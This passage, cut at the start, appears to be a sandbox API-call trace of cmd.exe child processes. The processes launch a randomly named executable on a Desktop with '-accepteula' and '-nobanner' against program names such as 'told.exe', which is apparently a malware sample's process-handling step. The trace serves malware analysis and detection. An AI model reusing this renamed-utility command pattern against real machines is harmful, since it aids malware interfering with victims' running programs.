lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43eb44) returned 0x4d4c30 [0231.912] GetProcessHeap () returned 0x4c0000 [0231.912] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x14) returned 0x4d4c70 [0231.912] FindClose (in: hFindFile=0x4d4c30 | out: hFindFile=0x4d4c30) returned 1 [0231.912] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0231.912] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0231.912] GetConsoleTitleW (in: lpConsoleTitle=0x43f01c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.223] InitializeProcThreadAttributeList (in: lpAttributeList=0x43eea4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x43ef6c | out: lpAttributeList=0x43eea4, lpSize=0x43ef6c) returned 1 [0232.223] UpdateProcThreadAttribute (in: lpAttributeList=0x43eea4, dwFlags=0x0, Attribute=0x60001, lpValue=0x43ef64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x43eea4, lpPreviousValue=0x0) returned 1 [0232.223] GetStartupInfoW (in: lpStartupInfo=0x43ee60 | out: lpStartupInfo=0x43ee60*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x80, hStdError=0xb)) [0232.224] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0232.225] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula \"told.exe\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x43ef00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"told.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x43ef4c | out: lpCommandLine="tdq963ii.exe -accepteula \"told.exe\" -nobanner", lpProcessInformation=0x43ef4c*(hProcess=0x78, hThread=0x74, dwProcessId=0x64, dwThreadId=0x38c)) returned 1 [0232.616] CloseHandle (hObject=0x74) returned 1 [0232.616] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0232.616] GetProcessHeap () returned 0x4c0000 [0232.616] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d2c38 | out: hHeap=0x4c0000) returned 1 [0232.616] GetEnvironmentStringsW () returned 0x4d2c38* [0232.616] GetProcessHeap () returned 0x4c0000 [0232.616] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xb78) returned 0x4d7310 [0232.616] FreeEnvironmentStringsW (penv=0x4d2c38) returned 1 [0232.616] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0248.203] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x43ee40 | out: lpExitCode=0x43ee40*=0x0) returned 1 [0248.203] CloseHandle (hObject=0x78) returned 1 [0248.203] _vsnwprintf (in: _Buffer=0x43ef88, _BufferCount=0x13, _Format="%08X", _ArgList=0x43ee4c | out: _Buffer="00000000") returned 8 [0248.203] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0248.203] GetProcessHeap () returned 0x4c0000 [0248.203] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d7310 | out: hHeap=0x4c0000) returned 1 [0248.203] GetEnvironmentStringsW () returned 0x4d2c38* [0248.203] GetProcessHeap () returned 0x4c0000 [0248.203] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xb78) returned 0x4d7310 [0248.203] FreeEnvironmentStringsW (penv=0x4d2c38) returned 1 [0248.203] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0248.203] GetProcessHeap () returned 0x4c0000 [0248.203] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d7310 | out: hHeap=0x4c0000) returned 1 [0248.203] GetEnvironmentStringsW () returned 0x4d2c38* [0248.204] GetProcessHeap () returned 0x4c0000 [0248.204] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xb78) returned 0x4d7310 [0248.204] FreeEnvironmentStringsW (penv=0x4d2c38) returned 1 [0248.204] GetProcessHeap () returned 0x4c0000 [0248.204] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d00a0 | out: hHeap=0x4c0000) returned 1 [0248.204] DeleteProcThreadAttributeList (in: lpAttributeList=0x43eea4 | out: lpAttributeList=0x43eea4) [0248.204] _get_osfhandle (_FileHandle=1) returned 0x80 [0248.204] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0248.204] _get_osfhandle (_FileHandle=1) returned 0x80 [0248.204] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0248.204] _get_osfhandle (_FileHandle=0) returned 0x3 [0248.204] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0248.205] SetConsoleInputExeNameW () returned 0x1 [0248.205] GetConsoleOutputCP () returned 0x1b5 [0248.205] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0248.205] SetThreadUILanguage (LangId=0x0) returned 0x409 [0248.205] exit (_Code=0) Process: id = "240" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2923d000" os_pid = "0xb14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "201" os_parent_pid = "0x7d8" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"mxslipstream.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 838 os_tid = 0xb30 [0230.628] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x39f8cc | out: lpSystemTimeAsFileTime=0x39f8cc*(dwLowDateTime=0x4092f140, dwHighDateTime=0x1d68287)) [0230.629] GetCurrentProcessId () returned 0xb14 [0230.629] GetCurrentThreadId () returned 0xb30 [0230.629] GetTickCount () returned 0x116510d [0230.629] QueryPerformanceCounter (in: lpPerformanceCount=0x39f8c4 | out: lpPerformanceCount=0x39f8c4*=35096773187) returned 1 [0230.630] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0230.630] __set_app_type (_Type=0x1) [0230.630] __p__fmode () returned 0x770331f4 [0230.630] __p__commode () returned 0x770331fc [0230.630] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0230.630] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0230.631] GetCurrentThreadId () returned 0xb30 [0230.631] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb30) returned 0x60 [0230.631] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0230.631] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0230.631] SetThreadUILanguage (LangId=0x0) returned 0x409 [0230.631] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0230.631] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x39f85c | out: phkResult=0x39f85c*=0x0) returned 0x2 [0230.631] VirtualQuery (in: lpAddress=0x39f893, lpBuffer=0x39f82c, dwLength=0x1c | out: lpBuffer=0x39f82c*(BaseAddress=0x39f000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0230.631] VirtualQuery (in: lpAddress=0x2a0000, lpBuffer=0x39f82c, dwLength=0x1c | out: lpBuffer=0x39f82c*(BaseAddress=0x2a0000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0230.631] VirtualQuery (in: lpAddress=0x2a1000, lpBuffer=0x39f82c, dwLength=0x1c | out: lpBuffer=0x39f82c*(BaseAddress=0x2a1000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0230.631] VirtualQuery (in: lpAddress=0x2a3000, lpBuffer=0x39f82c, dwLength=0x1c | out: lpBuffer=0x39f82c*(BaseAddress=0x2a3000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0230.631] VirtualQuery (in: lpAddress=0x3a0000, lpBuffer=0x39f82c, dwLength=0x1c | out: lpBuffer=0x39f82c*(BaseAddress=0x3a0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x30000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0230.631] GetConsoleOutputCP () returned 0x1b5 [0230.632] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0230.632] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0230.632] _get_osfhandle (_FileHandle=1) returned 0x80 [0230.632] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0230.632] _get_osfhandle (_FileHandle=1) returned 0x80 [0230.632] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0230.632] _get_osfhandle (_FileHandle=0) returned 0x3 [0230.632] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0230.633] GetEnvironmentStringsW () returned 0x3e2200* [0230.633] GetProcessHeap () returned 0x3d0000 [0230.633] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xb88) returned 0x3e2d90 [0230.633] FreeEnvironmentStringsW (penv=0x3e2200) returned 1 [0230.633] GetProcessHeap () returned 0x3d0000 [0230.633] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x4) returned 0x3e18e0 [0230.633] GetEnvironmentStringsW () returned 0x3e2200* [0230.633] GetProcessHeap () returned 0x3d0000 [0230.633] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xb88) returned 0x3e3920 [0230.634] FreeEnvironmentStringsW (penv=0x3e2200) returned 1 [0230.634] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x39e7cc | out: phkResult=0x39e7cc*=0x68) returned 0x0 [0230.634] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x0, lpData=0x39e7d8*=0x0, lpcbData=0x39e7d0*=0x1000) returned 0x2 [0230.634] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x4, lpData=0x39e7d8*=0x1, lpcbData=0x39e7d0*=0x4) returned 0x0 [0230.634] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x0, lpData=0x39e7d8*=0x1, lpcbData=0x39e7d0*=0x1000) returned 0x2 [0230.634] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x4, lpData=0x39e7d8*=0x0, lpcbData=0x39e7d0*=0x4) returned 0x0 [0230.634] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x4, lpData=0x39e7d8*=0x40, lpcbData=0x39e7d0*=0x4) returned 0x0 [0230.634] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x4, lpData=0x39e7d8*=0x40, lpcbData=0x39e7d0*=0x4) returned 0x0 [0230.634] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x0, lpData=0x39e7d8*=0x40, lpcbData=0x39e7d0*=0x1000) returned 0x2 [0230.634] RegCloseKey (hKey=0x68) returned 0x0 [0230.634] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x39e7cc | out: phkResult=0x39e7cc*=0x68) returned 0x0 [0230.635] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x0, lpData=0x39e7d8*=0x40, lpcbData=0x39e7d0*=0x1000) returned 0x2 [0230.635] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x4, lpData=0x39e7d8*=0x1, lpcbData=0x39e7d0*=0x4) returned 0x0 [0230.635] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x0, lpData=0x39e7d8*=0x1, lpcbData=0x39e7d0*=0x1000) returned 0x2 [0230.635] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x4, lpData=0x39e7d8*=0x0, lpcbData=0x39e7d0*=0x4) returned 0x0 [0230.635] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x4, lpData=0x39e7d8*=0x9, lpcbData=0x39e7d0*=0x4) returned 0x0 [0230.635] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x4, lpData=0x39e7d8*=0x9, lpcbData=0x39e7d0*=0x4) returned 0x0 [0230.635] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x39e7d4, lpData=0x39e7d8, lpcbData=0x39e7d0*=0x1000 | out: lpType=0x39e7d4*=0x0, lpData=0x39e7d8*=0x9, lpcbData=0x39e7d0*=0x1000) returned 0x2 [0230.635] RegCloseKey (hKey=0x68) returned 0x0 [0230.635] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2fe [0230.635] srand (_Seed=0x5f51e2fe) [0230.635] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"mxslipstream.exe\" -nobanner" [0230.635] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"mxslipstream.exe\" -nobanner" [0230.636] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0230.636] GetProcessHeap () returned 0x3d0000 [0230.636] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x210) returned 0x3e44b0 [0230.636] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e44b8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0230.637] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0230.637] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0230.637] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0230.637] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0230.637] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0230.637] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0230.637] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0230.637] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0230.637] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0230.637] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0230.637] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0230.637] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0230.637] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0230.637] GetProcessHeap () returned 0x3d0000 [0230.637] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x54) returned 0x3e46c8 [0230.637] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x39f598 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0230.637] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x39f598, lpFilePart=0x39f594 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x39f594*="Desktop") returned 0x25 [0230.637] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0230.637] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x39f314 | out: lpFindFileData=0x39f314*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x3e2080 [0230.637] FindClose (in: hFindFile=0x3e2080 | out: hFindFile=0x3e2080) returned 1 [0230.637] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x39f314 | out: lpFindFileData=0x39f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3e2080 [0230.638] FindClose (in: hFindFile=0x3e2080 | out: hFindFile=0x3e2080) returned 1 [0230.638] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0230.638] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x39f314 | out: lpFindFileData=0x39f314*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x3e2080 [0230.638] FindClose (in: hFindFile=0x3e2080 | out: hFindFile=0x3e2080) returned 1 [0230.638] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0230.638] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0230.638] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0230.638] GetProcessHeap () returned 0x3d0000 [0230.638] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e2d90 | out: hHeap=0x3d0000) returned 1 [0230.638] GetEnvironmentStringsW () returned 0x3e2200* [0230.638] GetProcessHeap () returned 0x3d0000 [0230.638] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xb88) returned 0x3e2d90 [0230.638] FreeEnvironmentStringsW (penv=0x3e2200) returned 1 [0230.638] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0230.638] GetProcessHeap () returned 0x3d0000 [0230.638] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e46c8 | out: hHeap=0x3d0000) returned 1 [0230.638] GetProcessHeap () returned 0x3d0000 [0230.638] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x400e) returned 0x3e4f28 [0230.639] GetProcessHeap () returned 0x3d0000 [0230.639] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x78) returned 0x3e8f58 [0230.639] GetProcessHeap () returned 0x3d0000 [0230.639] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e4f28 | out: hHeap=0x3d0000) returned 1 [0230.639] GetConsoleOutputCP () returned 0x1b5 [0230.639] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0230.639] GetUserDefaultLCID () returned 0x409 [0230.640] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0230.640] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x39f6d8, cchData=128 | out: lpLCData="0") returned 2 [0230.640] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x39f6d8, cchData=128 | out: lpLCData="0") returned 2 [0230.640] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x39f6d8, cchData=128 | out: lpLCData="1") returned 2 [0230.640] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0230.640] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0230.640] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0230.640] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0230.640] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0230.640] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0230.640] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0230.640] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0230.640] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0230.640] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0230.640] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0230.641] GetProcessHeap () returned 0x3d0000 [0230.641] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x0, Size=0x20c) returned 0x3e2200 [0230.642] GetConsoleTitleW (in: lpConsoleTitle=0x3e2200, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.097] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0231.097] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0231.097] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0231.097] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0231.097] GetProcessHeap () returned 0x3d0000 [0231.097] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x400a) returned 0x3e4f28 [0231.098] GetProcessHeap () returned 0x3d0000 [0231.098] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e4f28 | out: hHeap=0x3d0000) returned 1 [0231.099] _wcsicmp (_String1="tdq963ii.exe", _String2=")") returned 75 [0231.099] _wcsicmp (_String1="FOR", _String2="tdq963ii.exe") returned -14 [0231.099] _wcsicmp (_String1="FOR/?", _String2="tdq963ii.exe") returned -14 [0231.099] _wcsicmp (_String1="IF", _String2="tdq963ii.exe") returned -11 [0231.099] _wcsicmp (_String1="IF/?", _String2="tdq963ii.exe") returned -11 [0231.099] _wcsicmp (_String1="REM", _String2="tdq963ii.exe") returned -2 [0231.099] _wcsicmp (_String1="REM/?", _String2="tdq963ii.exe") returned -2 [0231.099] GetProcessHeap () returned 0x3d0000 [0231.099] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x58) returned 0x3e46c8 [0231.099] GetProcessHeap () returned 0x3d0000 [0231.099] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x22) returned 0x3e2418 [0231.100] GetProcessHeap () returned 0x3d0000 [0231.100] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x5c) returned 0x3e2448 [0231.101] GetConsoleTitleW (in: lpConsoleTitle=0x39f3d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.102] GetFileAttributesW (lpFileName="tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 